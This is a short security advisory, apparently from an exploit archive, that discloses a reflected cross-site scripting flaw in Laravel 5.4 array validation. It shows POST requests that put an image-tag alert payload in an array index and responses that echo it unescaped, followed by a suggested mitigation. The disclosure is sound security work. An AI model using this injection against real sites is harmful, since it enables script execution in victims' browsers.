Laravel 5.4 Cross Site Scripting

2017.03.07
Credit: MaHDyfo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Laravel non-presistent XSS in validation of arrays # Date: 06/03/2017 # Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com) # Vendor Homepage: laravel.com # Version: 5.4 In Laravel validation rules, assume that you set a rule to get an array input. $this->validate($request, [ 'lessons' => 'required|array', 'lessons.*' => 'numeric' ]); Here we say lessons should be array and the elements should be numeric. Now let's enter a character there to fail the validation. POST Request: lessons[]=1&lessons[]=4&lessons[]=abc It tells {"lessons.2":["The lessons.2 must be a number."]} That's OK up to here. But what if we place an index for the array. POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc Response: {"lessons.example":["The lessons.example must be a number."]} POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x onerror='alert(1)'>]=abc Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img src=x onerror='alert(1)'> must be a number."]} And it executes the alert with no problem... You can see this bug already exists in Laravel official doc: https://laravel.com/docs/master/validation#validating-arrays Maybe the solution is to validate the array values yourself by for example extending validation rules. Regards, MaHDyfo Iran


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top